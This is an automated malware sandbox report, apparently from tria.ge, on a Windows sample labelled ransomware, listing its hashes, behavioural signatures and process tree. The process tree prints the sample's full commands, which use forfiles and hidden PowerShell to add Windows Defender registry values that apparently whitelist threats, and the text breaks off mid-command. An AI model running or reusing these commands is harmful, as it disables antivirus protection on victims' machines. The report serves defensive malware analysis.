Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240910-en -
resource tags
arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system -
submitted
03/10/2024, 12:35
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win10v2004-20240910-en
General
-
Target
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
-
Size
6.7MB
-
MD5
bc58787697d3dfab922e9bbe376c7055
-
SHA1
06c8a66f338c809e73d1e7453b39b65be3558aec
-
SHA256
57dc9ae71f85b37c7968d4f3fea193ccb3d915d9afee8ec4fd165d3096f04561
-
SHA512
3648e7bf20cb61ec35979c8a9bcd2255ea79f83b9b29a23396dba72fd144e17cee380acf730c3ebcb2648f9d2d50cda766034ab543079e995496cb1cc21616ba
-
SSDEEP
196608:ebeOQSYdZtHckBGJ0soHJtOd4sGaVKJv2CSJG:EVYvVckBiQj5ak9S
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1904 powershell.exe 3312 powershell.EXE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 5040 forfiles.exe 4916 forfiles.exe 736 forfiles.exe 3448 forfiles.exe 2840 forfiles.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\manifest.json 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\YjQMAHbWU\faAvUyh.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\CMKMbRFSZeNU2\PGEJJPrBnsnUg.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\CMKMbRFSZeNU2\ymlANau.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\JXqrxIFSrhCmC\AZuAtnT.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\JXqrxIFSrhCmC\DDLWHNh.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\YjQMAHbWU\GJPBsU.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\LVzhRug.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\dLghTkXXJYUn\JjkVvCR.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\OzBNeCy.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\GqmqubHZBeiIxpo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 228 5116 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4764 schtasks.exe 1468 schtasks.exe 3080 schtasks.exe 4636 schtasks.exe 3084 schtasks.exe 4012 schtasks.exe 4092 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 1904 powershell.exe 1904 powershell.exe 4868 powershell.exe 4868 powershell.exe 2776 powershell.exe 2776 powershell.exe 3312 powershell.EXE 3312 powershell.EXE 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 3312 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5116 wrote to memory of 1004 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 86 PID 5116 wrote to memory of 1004 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 86 PID 5116 wrote to memory of 1004 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 86 PID 1004 wrote to memory of 3448 1004 cmd.exe 88 PID 1004 wrote to memory of 3448 1004 cmd.exe 88 PID 1004 wrote to memory of 3448 1004 cmd.exe 88 PID 3448 wrote to memory of 3084 3448 forfiles.exe 89 PID 3448 wrote to memory of 3084 3448 forfiles.exe 89 PID 3448 wrote to memory of 3084 3448 forfiles.exe 89 PID 3084 wrote to memory of 2648 3084 cmd.exe 90 PID 3084 wrote to memory of 2648 3084 cmd.exe 90 PID 3084 wrote to memory of 2648 3084 cmd.exe 90 PID 1004 wrote to memory of 2840 1004 cmd.exe 91 PID 1004 wrote to memory of 2840 1004 cmd.exe 91 PID 1004 wrote to memory of 2840 1004 cmd.exe 91 PID 2840 wrote to memory of 3176 2840 forfiles.exe 92 PID 2840 wrote to memory of 3176 2840 forfiles.exe 92 PID 2840 wrote to memory of 3176 2840 forfiles.exe 92 PID 3176 wrote to memory of 3656 3176 cmd.exe 93 PID 3176 wrote to memory of 3656 3176 cmd.exe 93 PID 3176 wrote to memory of 3656 3176 cmd.exe 93 PID 1004 wrote to memory of 5040 1004 cmd.exe 94 PID 1004 wrote to memory of 5040 1004 cmd.exe 94 PID 1004 wrote to memory of 5040 1004 cmd.exe 94 PID 5040 wrote to memory of 3548 5040 forfiles.exe 95 PID 5040 wrote to memory of 3548 5040 forfiles.exe 95 PID 5040 wrote to memory of 3548 5040 forfiles.exe 95 PID 3548 wrote to memory of 800 3548 cmd.exe 96 PID 3548 wrote to memory of 800 3548 cmd.exe 96 PID 3548 wrote to memory of 800 3548 cmd.exe 96 PID 1004 wrote to memory of 4916 1004 cmd.exe 97 PID 1004 wrote to memory of 4916 1004 cmd.exe 97 PID 1004 wrote to memory of 4916 1004 cmd.exe 97 PID 4916 wrote to memory of 1976 4916 forfiles.exe 98 PID 4916 wrote to memory of 1976 4916 forfiles.exe 98 PID 4916 wrote to memory of 1976 4916 forfiles.exe 98 PID 1976 wrote to memory of 1036 1976 cmd.exe 99 PID 1976 wrote to memory of 1036 1976 cmd.exe 99 PID 1976 wrote to memory of 1036 1976 cmd.exe 99 PID 1004 wrote to memory of 736 1004 cmd.exe 101 PID 1004 wrote to memory of 736 1004 cmd.exe 101 PID 1004 wrote to memory of 736 1004 cmd.exe 101 PID 736 wrote to memory of 3064 736 forfiles.exe 102 PID 736 wrote to memory of 3064 736 forfiles.exe 102 PID 736 wrote to memory of 3064 736 forfiles.exe 102 PID 3064 wrote to memory of 1904 3064 cmd.exe 103 PID 3064 wrote to memory of 1904 3064 cmd.exe 103 PID 3064 wrote to memory of 1904 3064 cmd.exe 103 PID 1904 wrote to memory of 2720 1904 powershell.exe 106 PID 1904 wrote to memory of 2720 1904 powershell.exe 106 PID 1904 wrote to memory of 2720 1904 powershell.exe 106 PID 5116 wrote to memory of 4868 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 110 PID 5116 wrote to memory of 4868 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 110 PID 5116 wrote to memory of 4868 5116 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 110 PID 4868 wrote to memory of 4556 4868 powershell.exe 112 PID 4868 wrote to memory of 4556 4868 powershell.exe 112 PID 4868 wrote to memory of 4556 4868 powershell.exe 112 PID 4556 wrote to memory of 1500 4556 cmd.exe 113 PID 4556 wrote to memory of 1500 4556 cmd.exe 113 PID 4556 wrote to memory of 1500 4556 cmd.exe 113 PID 4868 wrote to memory of 4848 4868 powershell.exe 114 PID 4868 wrote to memory of 4848 4868 powershell.exe 114 PID 4868 wrote to memory of 4848 4868 powershell.exe 114 PID 4868 wrote to memory of 1096 4868 powershell.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3656
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3548 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2720
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t 